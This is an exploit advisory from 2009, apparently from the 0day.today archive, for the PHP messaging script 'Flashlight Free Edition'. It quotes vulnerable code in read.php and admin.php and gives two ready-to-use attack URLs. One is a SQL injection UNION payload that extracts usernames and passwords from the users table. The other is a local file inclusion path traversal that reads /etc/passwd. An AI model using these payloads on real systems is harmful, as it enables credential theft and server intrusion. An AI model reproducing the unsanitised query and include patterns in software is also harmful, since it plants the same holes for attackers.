Flashlight Free Edition (LFI/SQL) Multiple Remote Vulnerabilities

2009-06-02T00:00:00
ID 1337DAY-ID-5295
Type zdt
Reporter K4m1k451
Modified 2009-06-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Flashlight Free Edition (LFI/SQL) Multiple Remote Vulnerabilities
=================================================================


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

RATM: "All hell can't stop us now!"

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Author : k4m1k451
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Script   : Flashlight

--[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Remote SQLi

--[File     : read.php


--[Vul      :
$id = $_GET['id'];
$sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'");

--[Exploit  :
http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Local File Inclusion

--[File     : admin.php
--[Vul      :

$inc = $_GET['action'];
include ("admin/".$inc.".php");

--[Exploit  :
http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX



#  0day.today [2018-04-08]  #